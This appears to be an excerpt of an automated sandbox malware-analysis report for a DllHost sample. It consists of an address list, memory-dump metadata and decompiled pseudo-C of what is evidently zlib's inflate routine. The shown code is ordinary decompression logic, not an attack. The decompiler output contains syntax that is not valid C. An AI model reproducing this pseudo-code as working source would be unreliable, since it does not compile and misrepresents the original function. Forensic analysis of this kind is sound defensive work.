                                                                                                                                                              0x7ff7191ce68e
                                                                                                                                                              0x7ff7191ce690
                                                                                                                                                              0x7ff7191ce6b7
                                                                                                                                                              0x7ff7191ce6b9
                                                                                                                                                              0x7ff7191ce6c7
                                                                                                                                                              0x7ff7191ce6d0
                                                                                                                                                              0x7ff7191ce6d7
                                                                                                                                                              0x7ff7191ce6db
                                                                                                                                                              0x7ff7191ce6e5
                                                                                                                                                              0x7ff7191ce6ee
                                                                                                                                                              0x7ff7191ce6f8
                                                                                                                                                              0x7ff7191ce708
                                                                                                                                                              0x7ff7191ce717
                                                                                                                                                              0x7ff7191ce720
                                                                                                                                                              0x7ff7191ce725
                                                                                                                                                              0x7ff7191ce72d
                                                                                                                                                              0x7ff7191ce739
                                                                                                                                                              0x7ff7191ce73e
                                                                                                                                                              0x7ff7191ce746
                                                                                                                                                              0x7ff7191ce74b
                                                                                                                                                              0x7ff7191ce752
                                                                                                                                                              0x7ff7191ce75a
                                                                                                                                                              0x7ff7191ce761
                                                                                                                                                              0x7ff7191ce768
                                                                                                                                                              0x7ff7191ce777
                                                                                                                                                              0x7ff7191ce783
                                                                                                                                                              0x7ff7191ce788
                                                                                                                                                              0x7ff7191ce790
                                                                                                                                                              0x7ff7191ce795
                                                                                                                                                              0x7ff7191ce79e
                                                                                                                                                              0x7ff7191ce7a7
                                                                                                                                                              0x7ff7191ce7ac
                                                                                                                                                              0x7ff7191ce7b4
                                                                                                                                                              0x7ff7191ce7c0
                                                                                                                                                              0x7ff7191ce7c4
                                                                                                                                                              0x7ff7191ce7d2
                                                                                                                                                              0x7ff7191ce7da
                                                                                                                                                              0x7ff7191ce7e0
                                                                                                                                                              0x7ff7191ce7e5
                                                                                                                                                              0x7ff7191ce7fa
                                                                                                                                                              0x7ff7191ce7ff
                                                                                                                                                              0x7ff7191ce806
                                                                                                                                                              0x7ff7191ce80b
                                                                                                                                                              0x7ff7191ce80d
                                                                                                                                                              0x7ff7191ce814
                                                                                                                                                              0x7ff7191ce819
                                                                                                                                                              0x7ff7191ce821
                                                                                                                                                              0x7ff7191ce82d
                                                                                                                                                              0x7ff7191ce838
                                                                                                                                                              0x7ff7191ce83e
                                                                                                                                                              0x7ff7191ce846
                                                                                                                                                              0x7ff7191ce849
                                                                                                                                                              0x7ff7191ce851
                                                                                                                                                              0x7ff7191ce85c
                                                                                                                                                              0x7ff7191ce865
                                                                                                                                                              0x7ff7191ce86f
                                                                                                                                                              0x7ff7191ce874
                                                                                                                                                              0x7ff7191ce877
                                                                                                                                                              0x7ff7191ce87c
                                                                                                                                                              0x7ff7191ce880
                                                                                                                                                              0x7ff7191ce885
                                                                                                                                                              0x7ff7191ce889
                                                                                                                                                              0x7ff7191ce88d
                                                                                                                                                              0x7ff7191ce89f
                                                                                                                                                              0x7ff7191ce8a4
                                                                                                                                                              0x7ff7191ce8a8
                                                                                                                                                              0x7ff7191ce8b1
                                                                                                                                                              0x7ff7191ce8b5
                                                                                                                                                              0x7ff7191ce8ba
                                                                                                                                                              0x7ff7191ce8c2
                                                                                                                                                              0x7ff7191ce8c8
                                                                                                                                                              0x7ff7191ce8d3
                                                                                                                                                              0x7ff7191ce8e1
                                                                                                                                                              0x7ff7191ce8ed
                                                                                                                                                              0x7ff7191ce8f0
                                                                                                                                                              0x7ff7191ce905
                                                                                                                                                              0x7ff7191ce909
                                                                                                                                                              0x7ff7191ce916
                                                                                                                                                              0x7ff7191ce918
                                                                                                                                                              0x7ff7191ce91a
                                                                                                                                                              0x7ff7191ce91f
                                                                                                                                                              0x7ff7191ce927
                                                                                                                                                              0x7ff7191ce935
                                                                                                                                                              0x7ff7191ce939
                                                                                                                                                              0x7ff7191ce941
                                                                                                                                                              0x7ff7191ce949
                                                                                                                                                              0x7ff7191ce94d
                                                                                                                                                              0x7ff7191ce953
                                                                                                                                                              0x7ff7191ce95e
                                                                                                                                                              0x7ff7191ce96b
                                                                                                                                                              0x7ff7191ce971
                                                                                                                                                              0x7ff7191ce974
                                                                                                                                                              0x7ff7191ce977
                                                                                                                                                              0x7ff7191ce97a
                                                                                                                                                              0x7ff7191ce986
                                                                                                                                                              0x7ff7191ce98a
                                                                                                                                                              0x7ff7191ce990
                                                                                                                                                              0x7ff7191ce992
                                                                                                                                                              0x7ff7191ce99a
                                                                                                                                                              0x7ff7191ce9a7
                                                                                                                                                              0x7ff7191ce9ad
                                                                                                                                                              0x7ff7191ce9b5
                                                                                                                                                              0x7ff7191ce9b7
                                                                                                                                                              0x7ff7191ce9ba
                                                                                                                                                              0x7ff7191ce9bd
                                                                                                                                                              0x7ff7191ce9c3
                                                                                                                                                              0x7ff7191ce9c6
                                                                                                                                                              0x7ff7191ce9c9
                                                                                                                                                              0x7ff7191ce9cc
                                                                                                                                                              0x7ff7191ce9cf
                                                                                                                                                              0x7ff7191ce9d8
                                                                                                                                                              0x7ff7191ce9dc
                                                                                                                                                              0x7ff7191ce9e2
                                                                                                                                                              0x7ff7191ce9e4
                                                                                                                                                              0x7ff7191ce9ec
                                                                                                                                                              0x7ff7191ce9f8
                                                                                                                                                              0x7ff7191ce9fb
                                                                                                                                                              0x7ff7191cea02
                                                                                                                                                              0x7ff7191cea0b
                                                                                                                                                              0x7ff7191cea11
                                                                                                                                                              0x7ff7191cea13
                                                                                                                                                              0x7ff7191cea1b
                                                                                                                                                              0x7ff7191cea22
                                                                                                                                                              0x7ff7191cea24
                                                                                                                                                              0x7ff7191cea2f
                                                                                                                                                              0x7ff7191cea36
                                                                                                                                                              0x7ff7191cea38
                                                                                                                                                              0x7ff7191cea3f
                                                                                                                                                              0x7ff7191cea44
                                                                                                                                                              0x7ff7191cea4c
                                                                                                                                                              0x7ff7191cea57
                                                                                                                                                              0x7ff7191cea5f
                                                                                                                                                              0x7ff7191cea63
                                                                                                                                                              0x7ff7191cea69
                                                                                                                                                              0x7ff7191cea6d
                                                                                                                                                              0x7ff7191cea72
                                                                                                                                                              0x7ff7191cea7f
                                                                                                                                                              0x7ff7191cea81
                                                                                                                                                              0x7ff7191cea83
                                                                                                                                                              0x7ff7191cea86
                                                                                                                                                              0x7ff7191cea8b
                                                                                                                                                              0x7ff7191cea8d
                                                                                                                                                              0x7ff7191cea96
                                                                                                                                                              0x7ff7191cea9e
                                                                                                                                                              0x7ff7191ceaa2
                                                                                                                                                              0x7ff7191ceaad
                                                                                                                                                              0x7ff7191ceab4
                                                                                                                                                              0x7ff7191ceac5
                                                                                                                                                              0x7ff7191cead1
                                                                                                                                                              0x7ff7191ceae2
                                                                                                                                                              0x7ff7191ceae6
                                                                                                                                                              0x7ff7191ceaf3
                                                                                                                                                              0x7ff7191ceaf5
                                                                                                                                                              0x7ff7191ceaf7
                                                                                                                                                              0x7ff7191ceafc
                                                                                                                                                              0x7ff7191ceb04
                                                                                                                                                              0x7ff7191ceb12
                                                                                                                                                              0x7ff7191ceb16
                                                                                                                                                              0x7ff7191ceb1e
                                                                                                                                                              0x7ff7191ceb22
                                                                                                                                                              0x7ff7191ceb28
                                                                                                                                                              0x7ff7191ceb33
                                                                                                                                                              0x7ff7191ceb40
                                                                                                                                                              0x7ff7191ceb46
                                                                                                                                                              0x7ff7191ceb49
                                                                                                                                                              0x7ff7191ceb4c
                                                                                                                                                              0x7ff7191ceb4f
                                                                                                                                                              0x7ff7191ceb5b
                                                                                                                                                              0x7ff7191ceb5f
                                                                                                                                                              0x7ff7191ceb65
                                                                                                                                                              0x7ff7191ceb67
                                                                                                                                                              0x7ff7191ceb72
                                                                                                                                                              0x7ff7191ceb7f
                                                                                                                                                              0x7ff7191ceb85
                                                                                                                                                              0x7ff7191ceb8d
                                                                                                                                                              0x7ff7191ceb8f
                                                                                                                                                              0x7ff7191ceb92
                                                                                                                                                              0x7ff7191ceb95
                                                                                                                                                              0x7ff7191ceb9b
                                                                                                                                                              0x7ff7191ceb9e
                                                                                                                                                              0x7ff7191ceba1
                                                                                                                                                              0x7ff7191ceba4
                                                                                                                                                              0x7ff7191ceba7
                                                                                                                                                              0x7ff7191cebb0
                                                                                                                                                              0x7ff7191cebb4
                                                                                                                                                              0x7ff7191cebba
                                                                                                                                                              0x7ff7191cebbc
                                                                                                                                                              0x7ff7191cebc4
                                                                                                                                                              0x7ff7191cebcb
                                                                                                                                                              0x7ff7191cebd8
                                                                                                                                                              0x7ff7191cebdb
                                                                                                                                                              0x7ff7191cebe2
                                                                                                                                                              0x7ff7191cebe8
                                                                                                                                                              0x7ff7191cebf1
                                                                                                                                                              0x7ff7191cebf6
                                                                                                                                                              0x7ff7191cebfe
                                                                                                                                                              0x7ff7191cec03
                                                                                                                                                              0x7ff7191cec10
                                                                                                                                                              0x7ff7191cec1a
                                                                                                                                                              0x7ff7191cec22
                                                                                                                                                              0x7ff7191cec26
                                                                                                                                                              0x7ff7191cec2c
                                                                                                                                                              0x7ff7191cec30
                                                                                                                                                              0x7ff7191cec34
                                                                                                                                                              0x7ff7191cec41
                                                                                                                                                              0x7ff7191cec43
                                                                                                                                                              0x7ff7191cec45
                                                                                                                                                              0x7ff7191cec48
                                                                                                                                                              0x7ff7191cec4d
                                                                                                                                                              0x7ff7191cec4f
                                                                                                                                                              0x7ff7191cec58
                                                                                                                                                              0x7ff7191cec5e
                                                                                                                                                              0x7ff7191cec60
                                                                                                                                                              0x7ff7191cec64
                                                                                                                                                              0x7ff7191cec6b
                                                                                                                                                              0x7ff7191cec76
                                                                                                                                                              0x7ff7191cec7c
                                                                                                                                                              0x7ff7191cec83
                                                                                                                                                              0x7ff7191cec88
                                                                                                                                                              0x7ff7191cec8a
                                                                                                                                                              0x7ff7191cec90
                                                                                                                                                              0x7ff7191cec9a
                                                                                                                                                              0x7ff7191cec9c
                                                                                                                                                              0x7ff7191ceca3
                                                                                                                                                              0x7ff7191ceca8
                                                                                                                                                              0x7ff7191cecb0
                                                                                                                                                              0x7ff7191cecb5
                                                                                                                                                              0x7ff7191cecbb
                                                                                                                                                              0x7ff7191cecc3
                                                                                                                                                              0x7ff7191ceccb
                                                                                                                                                              0x7ff7191cecd5
                                                                                                                                                              0x7ff7191cecd9
                                                                                                                                                              0x7ff7191cece0
                                                                                                                                                              0x7ff7191cece7
                                                                                                                                                              0x7ff7191cecf0
                                                                                                                                                              0x7ff7191cecf4
                                                                                                                                                              0x7ff7191cecf9
                                                                                                                                                              0x7ff7191cecfc
                                                                                                                                                              0x7ff7191cecff
                                                                                                                                                              0x7ff7191ced0a
                                                                                                                                                              0x7ff7191ced15
                                                                                                                                                              0x7ff7191ced18
                                                                                                                                                              0x7ff7191ced1e
                                                                                                                                                              0x7ff7191ced20
                                                                                                                                                              0x7ff7191ced29
                                                                                                                                                              0x7ff7191ced2f
                                                                                                                                                              0x7ff7191ced3f
                                                                                                                                                              0x7ff7191ced4a
                                                                                                                                                              0x7ff7191ced4d
                                                                                                                                                              0x7ff7191ced50
                                                                                                                                                              0x7ff7191ced53
                                                                                                                                                              0x7ff7191ced58
                                                                                                                                                              0x7ff7191ced60
                                                                                                                                                              0x7ff7191ced68
                                                                                                                                                              0x7ff7191ced72
                                                                                                                                                              0x7ff7191ced7b
                                                                                                                                                              0x7ff7191ced82
                                                                                                                                                              0x7ff7191ced8f
                                                                                                                                                              0x7ff7191ced93
                                                                                                                                                              0x7ff7191ced9c
                                                                                                                                                              0x7ff7191ced9e
                                                                                                                                                              0x7ff7191ceda1
                                                                                                                                                              0x7ff7191ceda6
                                                                                                                                                              0x7ff7191cedb0
                                                                                                                                                              0x7ff7191cedb5
                                                                                                                                                              0x7ff7191cedc9
                                                                                                                                                              0x7ff7191cedcb
                                                                                                                                                              0x7ff7191cedd0
                                                                                                                                                              0x7ff7191cedd2
                                                                                                                                                              0x7ff7191cedd7
                                                                                                                                                              0x7ff7191ceddf
                                                                                                                                                              0x7ff7191cede3
                                                                                                                                                              0x7ff7191cedec
                                                                                                                                                              0x7ff7191cedf4
                                                                                                                                                              0x7ff7191cedf9
                                                                                                                                                              0x7ff7191cee02
                                                                                                                                                              0x7ff7191cee2b
                                                                                                                                                              0x7ff7191cee34
                                                                                                                                                              0x7ff7191cee39
                                                                                                                                                              0x7ff7191cee41
                                                                                                                                                              0x7ff7191cee46
                                                                                                                                                              0x7ff7191cee49
                                                                                                                                                              0x7ff7191cee51
                                                                                                                                                              0x7ff7191cee54
                                                                                                                                                              0x7ff7191cee56
                                                                                                                                                              0x7ff7191cee5e
                                                                                                                                                              0x7ff7191cee68
                                                                                                                                                              0x7ff7191cee75
                                                                                                                                                              0x7ff7191cee7c
                                                                                                                                                              0x7ff7191cee81
                                                                                                                                                              0x7ff7191cee85
                                                                                                                                                              0x7ff7191cee94
                                                                                                                                                              0x7ff7191cee99
                                                                                                                                                              0x7ff7191cee9f
                                                                                                                                                              0x7ff7191ceea5
                                                                                                                                                              0x7ff7191ceeae
                                                                                                                                                              0x7ff7191ceeb3
                                                                                                                                                              0x7ff7191ceebb
                                                                                                                                                              0x7ff7191ceec0
                                                                                                                                                              0x7ff7191ceeca
                                                                                                                                                              0x7ff7191ceecf
                                                                                                                                                              0x7ff7191ceed3
                                                                                                                                                              0x7ff7191ceed8
                                                                                                                                                              0x7ff7191ceedc
                                                                                                                                                              0x7ff7191ceee0
                                                                                                                                                              0x7ff7191ceeeb
                                                                                                                                                              0x7ff7191ceef3
                                                                                                                                                              0x7ff7191ceefe
                                                                                                                                                              0x7ff7191cef06
                                                                                                                                                              0x7ff7191cef11
                                                                                                                                                              0x7ff7191cef19
                                                                                                                                                              0x7ff7191cef1f
                                                                                                                                                              0x7ff7191cef24
                                                                                                                                                              0x7ff7191cef2c
                                                                                                                                                              0x7ff7191cef31
                                                                                                                                                              0x7ff7191cef36
                                                                                                                                                              0x7ff7191cef3b
                                                                                                                                                              0x7ff7191cef40
                                                                                                                                                              0x7ff7191cef45
                                                                                                                                                              0x7ff7191cef4a
                                                                                                                                                              0x7ff7191cef53
                                                                                                                                                              0x7ff7191cef58
                                                                                                                                                              0x7ff7191cef5d
                                                                                                                                                              0x7ff7191cef64
                                                                                                                                                              0x7ff7191cef67
                                                                                                                                                              0x7ff7191cef76
                                                                                                                                                              0x7ff7191cef78
                                                                                                                                                              0x7ff7191cef7d
                                                                                                                                                              0x7ff7191cef7f
                                                                                                                                                              0x7ff7191cef84
                                                                                                                                                              0x7ff7191cef89
                                                                                                                                                              0x7ff7191cef8d
                                                                                                                                                              0x7ff7191cef92
                                                                                                                                                              0x7ff7191cef9c
                                                                                                                                                              0x7ff7191cefa4
                                                                                                                                                              0x7ff7191cefa6
                                                                                                                                                              0x7ff7191cefa9
                                                                                                                                                              0x7ff7191cefac
                                                                                                                                                              0x7ff7191cefae
                                                                                                                                                              0x7ff7191cefb4
                                                                                                                                                              0x7ff7191cefc2
                                                                                                                                                              0x7ff7191cefcd
                                                                                                                                                              0x7ff7191cefdb
                                                                                                                                                              0x7ff7191cefe3
                                                                                                                                                              0x7ff7191cefe8
                                                                                                                                                              0x7ff7191ceff2
                                                                                                                                                              0x7ff7191ceffc
                                                                                                                                                              0x7ff7191cf003
                                                                                                                                                              0x7ff7191cf01a

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: incorrect header check$invalid window size$unknown compression method
                                                                                                                                                              • API String ID: 0-1186847913
                                                                                                                                                              • Opcode ID: 8815b4b64e2a5940560b3d5f38d363ad217bad04e8d9d48d635176406d735c98
                                                                                                                                                              • Instruction ID: 07c9cfa4701a1286ff3918ba1e09fbcfab8529725afed99bb9fab5b6a145ae82
                                                                                                                                                              • Opcode Fuzzy Hash: 8815b4b64e2a5940560b3d5f38d363ad217bad04e8d9d48d635176406d735c98
                                                                                                                                                              • Instruction Fuzzy Hash: 6791DD7262868547F7A4AF14E44CA3E7ABDFB40368F914135DA49477C0DB38E9C9DB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191CE02C Relevance: 3.9, Strings: 3, Instructions: 161COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 67%
                                                                                                                                                              			E00007FF77FF7191CE02C(signed int __ebx, void* __edi, void* __ebp, signed char* __rsi, signed long long __r8, void* __r9, void* __r11, signed long long __r12, void* __r13, void* __r14) {
				signed int _t350;
				signed int _t351;
				intOrPtr _t362;
				void* _t363;
				signed int _t383;
				signed int _t386;
				unsigned int _t388;
				unsigned int _t392;
				signed int _t408;
				signed int _t410;
				signed int _t417;
				signed char _t422;
				signed int _t435;
				signed char _t440;
				unsigned int _t447;
				void* _t448;
				signed int _t457;
				signed int _t471;
				signed int _t480;
				signed int _t481;
				void* _t482;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t489;
				void* _t490;
				signed int _t491;
				void* _t492;
				signed int _t493;
				void* _t494;
				signed int _t495;
				void* _t496;
				signed int _t498;
				signed int _t499;
				void* _t500;
				signed int _t502;
				signed int _t503;
				void* _t504;
				signed int _t506;
				void* _t507;
				signed int _t508;
				signed int _t509;
				void* _t510;
				signed int _t512;
				void* _t513;
				signed int _t514;
				signed int _t516;
				signed int _t517;
				signed char _t526;
				signed char _t529;
				signed int _t531;
				signed char _t532;
				signed int _t536;
				signed char _t553;
				signed char _t557;
				signed char _t587;
				signed char _t590;
				signed char _t596;
				signed char _t620;
				signed char _t623;
				signed char _t629;
				void* _t631;
				intOrPtr _t632;
				void* _t636;
				signed int _t647;
				signed int _t656;
				signed char _t661;
				void* _t663;
				void* _t667;
				void* _t671;
				signed char _t683;
				signed char _t688;
				intOrPtr _t690;
				void* _t692;
				intOrPtr _t693;
				void* _t694;
				void* _t695;
				void* _t696;
				void* _t697;
				void* _t698;
				void* _t699;
				void* _t700;
				intOrPtr _t701;
				intOrPtr _t702;
				void* _t703;
				void* _t704;
				void* _t705;
				void* _t706;
				void* _t707;
				void* _t708;
				void* _t709;
				void* _t711;
				signed int _t717;
				unsigned int _t718;
				unsigned int _t721;
				unsigned int _t722;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				unsigned int _t728;
				unsigned int _t730;
				unsigned int _t735;
				unsigned int _t738;
				unsigned int _t741;
				signed int _t744;
				unsigned int _t745;
				unsigned int _t748;
				signed int _t750;
				unsigned int _t751;
				signed int _t754;
				unsigned int _t755;
				signed int _t757;
				unsigned int _t758;
				void* _t768;
				void* _t803;
				void* _t815;
				void* _t888;
				signed long long _t892;
				long long _t893;
				signed long long _t896;
				signed long long _t897;
				long long _t900;
				signed long long _t904;
				signed long long _t906;
				signed long long _t909;
				void* _t912;
				signed long long _t917;
				signed long long _t918;
				signed long long _t919;
				signed long long _t921;
				signed long long _t922;
				signed long long _t923;
				void* _t924;
				signed char* _t941;
				signed char* _t942;
				signed char* _t944;
				signed char* _t945;
				signed char* _t946;
				signed char* _t947;
				signed char* _t948;
				signed char* _t949;
				signed char* _t951;
				signed char* _t952;
				signed char* _t953;
				signed char* _t954;
				signed char* _t955;
				signed char* _t956;
				signed char* _t957;
				signed char* _t958;
				void* _t961;
				void* _t963;
				signed long long _t965;
				char* _t973;
				char* _t974;
				long long _t975;
				intOrPtr _t976;
				intOrPtr _t977;
				intOrPtr _t978;
				void* _t979;
				signed long long _t980;
				long long _t986;

				_t980 = __r12;
				_t979 = __r11;
				_t965 = __r8;
				if (__ebx - 0x20 >= 0) goto 0x191ce04f;
				if (__edi == 0) goto 0x191ce19f;
				_t692 = __edi - 1;
				_t713 = __ebp + (( *__rsi & 0x000000ff) << __ebx);
				_t941 =  &(__rsi[1]);
				if (__ebx + 8 - 0x20 < 0) goto 0x191ce031;
				_t480 = r15d;
				_t350 = (__ebp + (( *__rsi & 0x000000ff) << __ebx) >> 0x00000008 & 0x0000ff00) + ((__ebp + (( *__rsi & 0x000000ff) << __ebx) & 0x0000ff00) + (_t713 << 0x10) << 8) + (_t713 >> 0x18);
				 *(__r13 + 0x20) = _t350;
				 *(__r12 + 0x4c) = _t350;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3e;
				if ( *((intOrPtr*)(__r13 + 0x14)) == 0) goto 0x191ceec0;
				r8d = 0;
				_t351 = E00007FF77FF7191CF7F0(0, _t888, _t924, __r8, __r9);
				r10d =  *(_t963 + 0xb8);
				 *(__r13 + 0x20) = _t351;
				 *(__r12 + 0x4c) = _t351;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3f;
				if (__r14 - 5 - 1 <= 0) goto 0x191ce19f;
				if ( *(__r13 + 0xc) == 0) goto 0x191ce0e3;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4e;
				_t526 = _t480 & 0x00000007;
				_t481 = _t480 - _t526;
				goto 0x191cdffc;
				if (_t481 - 3 >= 0) goto 0x191ce106;
				if (_t692 == 0) goto 0x191ce19f;
				_t693 = _t692 - 1;
				_t717 = (r15d >> _t526) + (( *_t941 & 0x000000ff) << _t481);
				_t942 =  &(_t941[1]);
				_t482 = _t481 + 8;
				_t768 = _t482 - 3;
				if (_t768 < 0) goto 0x191ce0e8;
				_t718 = _t717 >> 1;
				 *(__r13 + 0xc) = _t717 & 0x00000001;
				if (_t768 == 0) goto 0x191ce23d;
				if (_t768 == 0) goto 0x191ce161;
				if (_t768 == 0) goto 0x191ce14e;
				if ((_t718 & 0x00000003) != 1) goto 0x191ce245;
				 *(__r12 + 0x20) = "invalid block type";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdffc;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f44;
				goto 0x191cdffc;
				 *(__r13 + 0x70) = 9;
				 *((long long*)(__r13 + 0x60)) = 0x191fec40;
				 *((long long*)(__r13 + 0x68)) = 0x191ff440;
				 *((intOrPtr*)(__r13 + 0x74)) = 5;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f47;
				if (r14d != 6) goto 0x191ce245;
				_t721 = _t718 >> 2 >> 2 >> 2;
				_t485 = _t482 + 0x2fffffff7;
				r14d =  *(_t963 + 0xa0);
				r15d =  *(_t963 + 0xb0);
				 *((long long*)(__r12 + 0x10)) =  *((intOrPtr*)(_t963 + 0x40));
				 *(__r12 + 0x18) =  *(_t963 + 0xb8);
				 *__r12 = _t942;
				 *((intOrPtr*)(__r12 + 8)) = _t693;
				 *(__r13 + 0x48) = _t721;
				 *(__r13 + 0x4c) = _t485;
				if ( *((intOrPtr*)(__r13 + 0x34)) != 0) goto 0x191ce20e;
				if (r14d ==  *(__r12 + 0x18)) goto 0x191cef31;
				_t362 =  *((intOrPtr*)(__r13 + 8));
				if (_t362 - 0x3f51 >= 0) goto 0x191cef31;
				if (_t362 - 0x3f4e < 0) goto 0x191ce20e;
				if ( *((intOrPtr*)(_t963 + 0xa8)) == 4) goto 0x191cef31;
				r8d = r14d;
				r8d = r8d -  *(__r12 + 0x18);
				_t363 = E00007FF77FF7191CF3B0(0x191ff440, _t912, __r12,  *((intOrPtr*)(__r12 + 0x10)), _t961); // executed
				if (_t363 == 0) goto 0x191cef31;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f52;
				goto 0x191cf00a;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f41;
				_t722 = _t721 >> 2;
				_t486 = _t485 + 0xfffffffd;
				_t529 = _t486 & 0x00000007;
				_t487 = _t486 - _t529;
				if (_t487 - 0x20 >= 0) goto 0x191ce27e;
				if (_t693 == 0) goto 0x191ce19f;
				_t694 = _t693 - 1;
				_t724 = (_t722 >> _t529) + (( *_t942 & 0x000000ff) << _t487);
				if (_t487 + 8 - 0x20 < 0) goto 0x191ce260;
				_t531 = _t724 & 0x0000ffff;
				if (_t531 ==  !_t724 >> 0x10) goto 0x191ce2a5;
				_t892 = "invalid stored block lengths";
				 *(__r12 + 0x20) = _t892;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191ce001;
				 *(__r13 + 0x50) = _t531;
				_t725 = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f42;
				_t489 = r15d;
				if (r14d == 6) goto 0x191ce19f;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f43;
				_t532 =  *(__r13 + 0x50);
				if (_t532 == 0) goto 0x191ce32b;
				r14d = r10d;
				_t371 =  <=  ? _t532 : _t694;
				r14d =  <=  ?  <=  ? _t532 : _t694 : r14d;
				if (r14d == 0) goto 0x191ce19f;
				r8d = r14d;
				E00007FF77FF7191D4380();
				r10d =  *(_t963 + 0xb8);
				_t695 = _t694 - r14d;
				r10d = r10d - r14d;
				 *(_t963 + 0xb8) = r10d;
				_t944 =  &(( &(_t942[1]))[_t892]);
				 *((long long*)(_t963 + 0x40)) =  *((intOrPtr*)(_t963 + 0x40)) + _t892;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) - r14d;
				goto 0x191ce001;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f3f;
				if (_t489 - 0xe >= 0) goto 0x191ce35e;
				if (_t695 == 0) goto 0x191ce19f;
				_t696 = _t695 - 1;
				_t726 = _t725 + (( *_t944 & 0x000000ff) << _t489);
				_t945 =  &(_t944[1]);
				_t490 = _t489 + 8;
				if (_t490 - 0xe < 0) goto 0x191ce340;
				_t491 = _t490 + 0xfffffff2;
				_t727 = _t726 >> 5;
				_t536 = (_t726 & 0x0000001f) + 0x101;
				_t728 = _t727 >> 5;
				 *(__r13 + 0x7c) = _t536;
				_t656 = (_t727 & 0x0000001f) + 1;
				 *(__r13 + 0x80) = _t656;
				 *((intOrPtr*)(__r13 + 0x78)) = (_t728 & 0x0000000f) + 4;
				if (_t536 - 0x11e > 0) goto 0x191ce4c0;
				if (_t656 - 0x1e > 0) goto 0x191ce4c0;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f45;
				if ( *(__r13 + 0x84) -  *((intOrPtr*)(__r13 + 0x78)) >= 0) goto 0x191ce428;
				if (_t491 - 3 >= 0) goto 0x191ce3ee;
				if (_t696 == 0) goto 0x191ce19f;
				_t697 = _t696 - 1;
				_t730 = (_t728 >> 4) + (( *_t945 & 0x000000ff) << _t491);
				_t946 =  &(_t945[1]);
				_t492 = _t491 + 8;
				if (_t492 - 3 < 0) goto 0x191ce3d0;
				_t493 = _t492 + 0xfffffffd;
				 *(__r13 + 0x90 + _t892 * 2) = _t730 & 7;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				_t383 =  *(__r13 + 0x84);
				if (_t383 -  *((intOrPtr*)(__r13 + 0x78)) < 0) goto 0x191ce3c4;
				if (_t383 - 0x13 >= 0) goto 0x191ce45a;
				 *(__r13 + 0x90 + _t892 * 2) = r15w;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				if ( *(__r13 + 0x84) - 0x13 < 0) goto 0x191ce430;
				_t917 = __r13 + 0x70;
				_t893 = __r13 + 0x550;
				 *_t917 = 7;
				 *((long long*)(__r13 + 0x60)) = _t893;
				 *((long long*)(__r13 + 0x88)) = _t893;
				 *((long long*)(_t963 + 0x28)) = __r13 + 0x310;
				 *(_t963 + 0x20) = _t917;
				_t87 = _t917 + 0x13; // 0x13
				r8d = _t87;
				_t386 = E00007FF77FF7191CFB00(0, __r13 + 0x90, _t961, __r13 + 0x88, __r12);
				 *(_t963 + 0xb0) = _t386;
				if (_t386 == 0) goto 0x191ce4d9;
				 *(_t980 + 0x20) = "invalid code lengths set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				_t896 = "too many length or distance symbols";
				 *(_t980 + 0x20) = _t896;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191ce001;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f46;
				r10d =  *(__r13 + 0x7c);
				if ( *(__r13 + 0x84) -  *(__r13 + 0x80) + r10d >= 0) goto 0x191ce702;
				r9d = 1;
				_t976 =  *((intOrPtr*)(__r13 + 0x60));
				r9d = r9d <<  *(__r13 + 0x70);
				r9d = r9d - 1;
				_t918 = _t917 & _t896;
				_t388 =  *(_t976 + _t918 * 4);
				r8d = _t388;
				r8d = r8d >> 0x10;
				 *(_t963 + 0x34) = _t388;
				if ((_t388 >> 0x00000008 & 0x000000ff) - _t493 <= 0) goto 0x191ce583;
				if (_t697 == 0) goto 0x191ce19f;
				_t698 = _t697 - 1;
				_t947 =  &(_t946[1]);
				_t494 = _t493 + 8;
				_t897 = _t896 & _t918;
				_t392 =  *(_t976 + _t897 * 4);
				_t661 = _t392 >> 8;
				r8d = _t392;
				r8d = r8d >> 0x10;
				 *(_t963 + 0x34) = _t392;
				if ((_t661 & 0x000000ff) - _t494 > 0) goto 0x191ce547;
				_t803 = r8w - 0x10;
				if (_t803 >= 0) goto 0x191ce5ba;
				_t495 = _t494 - (_t661 & 0x000000ff);
				 *((short*)(__r13 + 0x90 + _t918 * 2)) = _t392 >> 0x10;
